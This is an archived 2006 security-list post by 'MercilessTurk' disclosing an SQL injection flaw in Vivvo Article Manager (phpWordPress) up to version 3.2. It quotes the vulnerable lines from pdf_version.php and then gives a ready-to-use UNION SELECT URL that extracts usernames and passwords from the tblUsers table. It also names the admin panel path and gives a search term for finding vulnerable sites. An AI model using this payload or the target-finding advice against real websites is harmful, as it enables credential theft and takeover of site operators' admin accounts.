Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit

Popper <= v1.41 (form) Remote File Inclusion Exploit

[SA21826] Stefan E. Newsscript Multiple Vulnerabilities

OPENi-CMS 1.0. 1(config) Remote File Inclusion Vulnerability

From:	info_(at)_kahramanhost.com <info_(at)_kahramanhost.com>
Date:	12.09.2006
Subject:	phpWordPress (Vivvo Article Manager)

############################################################
#MercilessTurk info@kahramanhost.com
############################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
############################################################
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.
############################################################
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,
3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24%20FROM%20tblUsers%20where%20userid=[target_user_id]
############################################################
#Admin Panel:http://[target]/[path]/admin
############################################################
#For google searching:Vivvo Article Manager
############################################################
#Greetz: sanaldarbe.com members.
############################################################